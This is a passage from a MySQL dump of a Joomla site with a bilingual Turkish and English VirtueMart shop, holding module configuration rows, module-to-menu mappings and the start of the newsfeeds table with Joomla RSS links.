00:00:00',0,'mod_banners',1,1,'{\"target\":\"1\",\"count\":\"1\",\"cid\":\"1\",\"catid\":[\"15\"],\"tag_search\":\"0\",\"ordering\":\"random\",\"header_text\":\"\",\"footer_text\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\"}',0,'*'),(107,231,'ARI Ext Menu','','',0,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_ariextmenu',1,1,'',0,'*'),(108,232,'CNC Video','','',2,'position-7',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_ariextmenu',1,1,'{\"menutype\":\"solmenu-video-cnc\",\"direction\":\"vertical\",\"startLevel\":\"1\",\"endLevel\":\"3\",\"onlyActiveItems\":\"0\",\"highlightCurrent\":\"0\",\"moduleclass_sfx\":\"\",\"loadExtJS\":\"1\",\"loadMethod\":\"ready\",\"uniqId\":\"0\",\"autoWidth\":\"1\",\"animate\":\"1\",\"delay\":\"0.2\",\"transitionType\":\"fade\",\"transitionDuration\":\"0.2\",\"zIndex\":\"\",\"bgColor\":\"\",\"textColor\":\"\",\"bgHoverColor\":\"\",\"textHoverColor\":\"\",\"bgCurrentColor\":\"\",\"textCurrentColor\":\"\",\"fontSize\":\"12px\",\"fontWeight\":\"normal\",\"textAlign\":\"left\",\"textTransform\":\"none\",\"inheritMain\":\"1\",\"sub_bgColor\":\"\",\"sub_textColor\":\"\",\"sub_bgHoverColor\":\"\",\"sub_textHoverColor\":\"\",\"sub_bgCurrentColor\":\"\",\"sub_textCurrentColor\":\"\",\"sub_fontSize\":\"12px\",\"sub_fontWeight\":\"normal\",\"sub_textAlign\":\"left\",\"sub_textTransform\":\"none\",\"customstyle\":\"\",\"cache\":\"0\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(58,0,'Special!','','<h1>This week we have a special, half price on delicious oranges!</h1><div>Only for our special customers!</div><div>Use the code: Joomla! when ordering</div><p><em>This module can only be seen by people in the customers group or higher.</em></p>',1,'position-12',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',4,1,'{\"prepare_content\":\"1\",\"layout\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(62,0,'Language Switcher','','',3,'position-4',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_languages',1,1,'{\"header_text\":\"\",\"footer_text\":\"\",\"image\":\"1\",\"layout\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(63,0,'Search','','',1,'position-0',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_search',1,1,'{\"width\":\"20\",\"text\":\"\",\"button\":\"\",\"button_pos\":\"right\",\"imagebutton\":\"1\",\"button_text\":\"\",\"set_itemid\":\"\",\"layout\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(64,211,'Language Switcher','','',1,'position-2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_languages',1,1,'{\"header_text\":\"\",\"footer_text\":\"\",\"dropdown\":\"0\",\"dropdownimage\":\"1\",\"lineheight\":\"0\",\"image\":\"1\",\"show_active\":\"1\",\"full_name\":\"1\",\"inline\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(65,0,'About Fruit Shop','','<p>The Fruit Shop site shows a number of Joomla! features.</p><p>The template uses classes in cascading style sheets to change the layout of items, such as creating the horizontal alphabetical list in the Fruit Encyclopedia.</p><p> </p>',1,'position-4',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"layout\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(69,0,'Articles Category','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_articles_category',1,1,'{\"mode\":\"normal\",\"show_on_article_page\":\"1\",\"show_front\":\"show\",\"count\":\"0\",\"category_filtering_type\":\"1\",\"catid\":[\"72\"],\"show_child_category_articles\":\"0\",\"levels\":\"1\",\"author_filtering_type\":\"1\",\"created_by\":[\"\"],\"author_alias_filtering_type\":\"1\",\"created_by_alias\":[\"\"],\"excluded_articles\":\"\",\"date_filtering\":\"off\",\"date_field\":\"a.created\",\"start_date_range\":\"\",\"end_date_range\":\"\",\"relative_date\":\"30\",\"article_ordering\":\"a.title\",\"article_ordering_direction\":\"ASC\",\"article_grouping\":\"none\",\"article_grouping_direction\":\"ksort\",\"month_year_format\":\"F Y\",\"item_heading\":\"4\",\"link_titles\":\"1\",\"show_date\":\"0\",\"show_date_field\":\"created\",\"show_date_format\":\"Y-m-d H:i:s\",\"show_category\":\"0\",\"show_hits\":\"0\",\"show_author\":\"0\",\"show_introtext\":\"0\",\"introtext_limit\":\"100\",\"show_readmore\":\"0\",\"show_readmore_title\":\"1\",\"readmore_limit\":\"15\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"owncache\":\"1\",\"cache_time\":\"900\"}',0,'*'),(70,0,'Search (Atomic Template)','','',1,'atomic-search',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_search',1,0,'{\"width\":\"20\",\"text\":\"\",\"button\":\"\",\"button_pos\":\"right\",\"imagebutton\":\"\",\"button_text\":\"\",\"set_itemid\":\"\",\"layout\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(71,0,'Top Menu (Atomic Template)','','',1,'atomic-topmenu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_menu',1,0,'{\"menutype\":\"aboutjoomla\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(72,0,'Top Quote (Atomic Template)','','<hr />\r\n<h2 class=\"alt\">Powerful Content Management and a Simple Extensible Framework.</h2>\r\n<hr />',1,'atomic-topquote',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,0,'{\"prepare_content\":\"1\",\"layout\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(73,0,'Bottom Left Column (Atomic Template)','','<h6>This is a nested column</h6>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.</p>',1,'atomic-bottomleft',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,0,'{\"prepare_content\":\"1\",\"layout\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(74,0,'Bottom Middle Column (Atomic Template)','','<h6>This is another nested column</h6>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.</p>',1,'atomic-bottommiddle',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,0,'{\"prepare_content\":\"1\",\"layout\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(75,0,'Sidebar (Atomic Template)','','<h3>A <span class=\"alt\">Simple</span> Sidebar</h3>\r\n<p>Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Cras ornare mattis nunc. Mauris venenatis, pede sed aliquet vehicula, lectus tellus pulvinar neque, non cursus sem nisi vel augue.</p>\r\n<p class=\"quiet\">Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Cras ornare mattis nunc. Mauris venenatis, pede sed aliquet vehicula, lectus tellus pulvinar neque, non cursus sem nisi vel augue.</p>\r\n<h5>Incremental leading</h5>\r\n<p class=\"incr\">Vestibulum ante ipsum primis in faucibus orci luctus vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Cras ornare mattis nunc. Mauris venenatis, pede sed aliquet vehicula, lectus tellus pulvinar neque, non cursus sem nisi vel augue. sed aliquet vehicula, lectus tellus.</p>\r\n<p class=\"incr\">Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Cras ornare mattis nunc. Mauris venenatis, pede sed aliquet vehicula, lectus tellus pulvinar neque, non cursus sem nisi vel augue. sed aliquet vehicula, lectus tellus pulvinar neque, non cursus sem nisi vel augue. ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Cras ornare mattis nunc. Mauris venenatis, pede sed aliquet vehicula, lectus tellus pulvinar neque, non cursus sem nisi vel augue. sed aliquet vehicula, lectus tellus pulvinar neque, non cursus sem nisi vel augue.</p>',1,'atomic-sidebar',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,0,'{\"prepare_content\":\"1\",\"layout\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(76,0,'Login (Atomic Template)','','',2,'atomic-sidebar',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_login',1,0,'{\"pretext\":\"\",\"posttext\":\"\",\"login\":\"\",\"logout\":\"\",\"greeting\":\"1\",\"name\":\"0\",\"usesecure\":\"0\",\"layout\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',0,'*'),(77,0,'Shop','','',1,'position-11',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_banners',1,0,'{\"target\":\"1\",\"count\":\"1\",\"cid\":\"2\",\"catid\":[\"15\"],\"tag_search\":\"0\",\"ordering\":\"0\",\"header_text\":\"\",\"footer_text\":\"Shop!\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\"}',0,'*'),(78,0,'Contribute','','',1,'position-9',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_banners',1,0,'{\"target\":\"1\",\"count\":\"1\",\"cid\":\"1\",\"catid\":[\"15\"],\"tag_search\":\"0\",\"ordering\":\"0\",\"header_text\":\"\",\"footer_text\":\"Contribute! \",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\"}',0,'*'),(84,0,'Smart Search Module','','',2,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_finder',1,1,'{\"searchfilter\":\"\",\"show_autosuggest\":\"1\",\"show_advanced\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"field_size\":20,\"alt_label\":\"\",\"show_label\":\"0\",\"label_pos\":\"top\",\"show_button\":\"0\",\"button_pos\":\"right\",\"opensearch\":\"1\",\"opensearch_title\":\"\"}',0,'*'),(87,0,'VM - Administrator Module','','',5,'menu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_vmmenu',3,1,'',1,'*'),(88,0,'Döviz Cinsi','','',5,'position-4',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_virtuemart_currencies',1,1,'{\"text_before\":\"\",\"product_currency\":\"\",\"cache\":\"0\",\"moduleclass_sfx\":\"\",\"class_sfx\":\"\"}',0,'tr-TR'),(89,0,'VM - Featured products','','',3,'position-4',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_virtuemart_product',1,1,'',0,'*'),(90,0,'Arama','','',2,'position-5',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_virtuemart_search',1,1,'{\"width\":\"20\",\"text\":\"\",\"filter_category\":\"0\",\"button\":\"0\",\"button_pos\":\"right\",\"imagebutton\":\"0\",\"button_text\":\"\",\"set_itemid\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\"}',0,'tr-TR'),(91,215,'Temsilcilikler','','',5,'position-7',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_virtuemart_manufacturer',1,0,'{\"show\":\"image\",\"display_style\":\"list\",\"manufacturers_per_row\":\"\",\"headerText\":\"\",\"footerText\":\"\",\"layout\":\"_:default\",\"cache\":\"1\",\"moduleclass_sfx\":\"\",\"class_sfx\":\"\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(92,0,'Sepetim','','',1,'position-0',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_virtuemart_cart',1,1,'{\"moduleclass_sfx\":\"\",\"show_price\":\"0\",\"show_product_list\":\"0\"}',0,'tr-TR'),(93,218,'Ürünler','','',1,'position-7',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_virtuemart_category',1,1,'{\"Parent_Category_id\":\"0\",\"level\":\"2\",\"layout\":\"_:default\",\"cache\":\"1\",\"moduleclass_sfx\":\"\",\"class_sfx\":\"\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'tr-TR'),(94,230,'TopMenu-TR','','',1,'position-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,1,'{\"menutype\":\"topmenu-tr\",\"base\":\"\",\"startLevel\":1,\"endLevel\":0,\"showAllChildren\":0,\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":1,\"cache_time\":900,\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'tr-TR'),(95,0,'TopMenu-EN','','',1,'position-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,1,'{\"menutype\":\"topmenu-en\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'en-GB'),(96,239,'DJ-ImageSlider','','',1,'position-0',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_djimageslider',1,1,'{\"slider_source\":\"0\",\"slider_type\":\"2\",\"theme\":\"default\",\"link_image\":\"1\",\"image_folder\":\"images\\/slideshow\",\"link\":\"\",\"show_title\":\"0\",\"show_desc\":\"0\",\"show_readmore\":\"0\",\"readmore_text\":\"\",\"link_title\":\"1\",\"link_desc\":\"0\",\"limit_desc\":\"\",\"full_width\":\"0\",\"image_width\":\"900\",\"image_height\":\"250\",\"fit_to\":\"2\",\"image_centering\":\"0\",\"visible_images\":\"1\",\"space_between_images\":\"10\",\"max_images\":\"20\",\"sort_by\":\"1\",\"css3\":\"1\",\"autoplay\":\"1\",\"looponce\":\"0\",\"show_buttons\":\"1\",\"show_arrows\":\"1\",\"show_custom_nav\":\"0\",\"wcag\":\"1\",\"desc_width\":\"\",\"desc_bottom\":\"0\",\"desc_horizontal\":\"0\",\"left_arrow\":\"\",\"right_arrow\":\"\",\"play_button\":\"\",\"pause_button\":\"\",\"arrows_top\":\"30\",\"arrows_horizontal\":\"5\",\"idx_style\":\"0\",\"effect\":\"Cubic\",\"effect_type\":\"0\",\"duration\":\"\",\"delay\":\"\",\"preload\":\"800\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(97,0,'Products','','',1,'position-7',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_virtuemart_category',1,1,'{\"Parent_Category_id\":\"0\",\"layout\":\"default\",\"cache\":\"1\",\"moduleclass_sfx\":\"\",\"class_sfx\":\"\"}',0,'en-GB'),(98,0,'Test','','',1,'position-7',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_virtuemart_category',1,1,'{\"Parent_Category_id\":\"0\",\"layout\":\"default\",\"cache\":\"1\",\"moduleclass_sfx\":\"\",\"class_sfx\":\"\"}',0,'*'),(99,0,'VM Category','','',1,'position-7',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_virtuemart_category',1,1,'{\"Parent_Category_id\":\"0\",\"layout\":\"default\",\"cache\":\"1\",\"moduleclass_sfx\":\"\",\"class_sfx\":\"\"}',0,'*'),(100,0,'Search','','',1,'position-5',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_virtuemart_search',1,1,'{\"width\":\"20\",\"text\":\"\",\"filter_category\":\"0\",\"button\":\"0\",\"button_pos\":\"right\",\"imagebutton\":\"0\",\"button_text\":\"\",\"set_itemid\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\"}',0,'en-GB'),(101,0,'Technical Info','','',4,'position-7',0,'0000-00-00 00:00:00','2019-09-16 11:21:57','0000-00-00 00:00:00',1,'mod_menu',1,1,'{\"menutype\":\"teknikbilgiler-en\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"_menu\",\"cache\":\"0\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'en-GB'),(102,0,'Currency Type','','',5,'position-4',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_virtuemart_currencies',1,1,'{\"text_before\":\"\",\"product_currency\":\"\",\"cache\":\"0\",\"moduleclass_sfx\":\"\",\"class_sfx\":\"\"}',0,'en-GB'),(103,0,'User Profile','','',8,'position-4',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',2,1,'{\"menutype\":\"usermenu\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"_menu\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'en-GB'),(104,212,'jdlanguage','','',0,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_jdlanguage',1,1,'',0,'*'),(105,214,'Ürünler2','','',1,'position-7',0,'0000-00-00 00:00:00','2017-11-05 13:05:24','0000-00-00 00:00:00',-2,'mod_virtuemart_category',1,1,'{\"Parent_Category_id\":\"0\",\"level\":\"2\",\"layout\":\"_:all\",\"cache\":\"0\",\"moduleclass_sfx\":\"\",\"class_sfx\":\"\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'tr-TR'),(106,222,'CNC Video','','',1,'position-7',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,1,'{\"menutype\":\"solmenu-video-cnc\",\"base\":\"\",\"startLevel\":1,\"endLevel\":0,\"showAllChildren\":0,\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":1,\"cache_time\":900,\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*');
/*!40000 ALTER TABLE `fz6t4_modules` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_modules_menu`
--

DROP TABLE IF EXISTS `fz6t4_modules_menu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_modules_menu` (
  `moduleid` int NOT NULL DEFAULT '0',
  `menuid` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`moduleid`,`menuid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_modules_menu`
--

LOCK TABLES `fz6t4_modules_menu` WRITE;
/*!40000 ALTER TABLE `fz6t4_modules_menu` DISABLE KEYS */;
INSERT INTO `fz6t4_modules_menu` VALUES (1,101),(2,0),(3,0),(4,0),(6,0),(7,0),(8,0),(9,0),(10,0),(12,0),(13,0),(14,0),(15,0),(16,205),(16,435),(17,0),(18,0),(19,-463),(19,-462),(19,-433),(19,-432),(19,-431),(19,-430),(19,-429),(19,-427),(19,-400),(19,-399),(19,-296),(19,-244),(19,-243),(19,-242),(19,-234),(20,0),(22,231),(22,234),(22,238),(22,242),(22,243),(22,244),(22,296),(22,399),(22,400),(23,-463),(23,-462),(23,-433),(23,-432),(23,-431),(23,-430),(23,-429),(23,-427),(23,-400),(23,-399),(23,-296),(23,-244),(23,-243),(23,-242),(23,-238),(23,-234),(25,294),(26,-463),(26,-462),(26,-433),(26,-432),(26,-431),(26,-430),(26,-429),(26,-427),(26,-400),(26,-399),(26,-296),(26,-244),(26,-243),(26,-242),(26,-238),(26,-234),(27,325),(28,310),(29,302),(30,410),(31,309),(32,309),(33,307),(34,326),(35,306),(36,304),(37,311),(38,300),(39,301),(40,313),(41,324),(44,312),(45,303),(47,231),(47,234),(47,242),(47,243),(47,244),(47,296),(47,399),(47,400),(48,418),(49,417),(52,416),(56,305),(57,238),(57,427),(57,429),(57,430),(57,431),(57,432),(57,433),(57,462),(57,463),(58,427),(58,429),(58,430),(58,431),(58,432),(58,433),(58,462),(58,463),(61,443),(62,231),(62,234),(62,242),(62,243),(62,244),(62,296),(62,399),(62,400),(63,0),(64,0),(65,427),(65,429),(65,430),(65,431),(65,432),(65,433),(65,462),(65,463),(68,243),(69,459),(70,285),(70,316),(71,285),(71,316),(72,285),(72,316),(73,285),(73,316),(74,285),(74,316),(75,285),(75,316),(76,285),(76,316),(77,0),(78,0),(79,0),(84,467),(86,0),(87,0),(88,0),(89,0),(90,0),(91,0),(92,0),(93,0),(94,0),(95,0),(96,0),(97,0),(98,0),(99,0),(100,0),(101,-463),(101,-462),(101,-433),(101,-432),(101,-431),(101,-430),(101,-429),(101,-427),(101,-400),(101,-399),(101,-296),(101,-244),(101,-243),(101,-242),(101,-238),(101,-234),(102,0),(103,-463),(103,-462),(103,-433),(103,-432),(103,-431),(103,-430),(103,-429),(103,-427),(103,-400),(103,-399),(103,-296),(103,-244),(103,-243),(103,-242),(103,-234),(105,0),(106,0),(108,0);
/*!40000 ALTER TABLE `fz6t4_modules_menu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_newsfeeds`
--

DROP TABLE IF EXISTS `fz6t4_newsfeeds`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_newsfeeds` (
  `catid` int NOT NULL DEFAULT '0',
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `link` varchar(2048) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `numarticles` int unsigned NOT NULL DEFAULT '1',
  `cache_time` int unsigned NOT NULL DEFAULT '3600',
  `checked_out` int unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int NOT NULL DEFAULT '0',
  `rtl` tinyint NOT NULL DEFAULT '0',
  `access` int unsigned NOT NULL DEFAULT '0',
  `language` char(7) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `params` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int unsigned NOT NULL DEFAULT '0',
  `metakey` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadata` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `xreference` varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `description` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `version` int unsigned NOT NULL DEFAULT '1',
  `hits` int unsigned NOT NULL DEFAULT '0',
  `images` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`published`),
  KEY `idx_catid` (`catid`),
  KEY `idx_createdby` (`created_by`),
  KEY `idx_language` (`language`),
  KEY `idx_xreference` (`xreference`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_newsfeeds`
--

LOCK TABLES `fz6t4_newsfeeds` WRITE;
/*!40000 ALTER TABLE `fz6t4_newsfeeds` DISABLE KEYS */;
INSERT INTO `fz6t4_newsfeeds` VALUES (17,1,'Joomla! Announcements','joomla-announcements','http://www.joomla.org/announcements.feed?type=rss',1,5,3600,0,'0000-00-00 00:00:00',1,1,1,'en-GB','{\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\",\"newsfeed_layout\":\"\",\"feed_display_order\":\"\"}','2011-01-01 00:00:01',676,'','2011-12-27 12:25:05',42,'','','{\"robots\":\"\",\"rights\":\"\"}','','0000-00-00 00:00:00','0000-00-00 00:00:00','',1,0,''),(17,2,'New Joomla! Extensions','new-joomla-extensions','http://feeds.joomla.org/JoomlaExtensions',1,5,3600,0,'0000-00-00 00:00:00',4,1,1,'en-GB','{\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\",\"newsfeed_layout\":\"\",\"feed_display_order\":\"\"}','2011-01-01 00:00:01',676,'','2011-12-27 12:25:36',42,'','','{\"robots\":\"\",\"rights\":\"\"}','','0000-00-00 00:00:00','0000-00-00 00:00:00','',1,0,''),(17,3,'Joomla! Security News','joomla-security-news','http://feeds.joomla.org/JoomlaSecurityNews',1,5,3600,0,'0000-00-00 00:00:00',2,1,1,'en-GB','{\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\",\"newsfeed_layout\":\"\",\"feed_display_order\":\"\"}','2011-01-01 00:00:01',676,'','2011-12-27 12:24:55',42,'','','{\"robots\":\"\",\"rights\":\"\"}','','0000-00-00 00:00:00','0000-00-00 00:00:00','',1,0,''),(17,4,'Joomla! Connect','joomla-connect','http://feeds.joomla.org/JoomlaConnect',1,5,3600,0,'0000-00-00 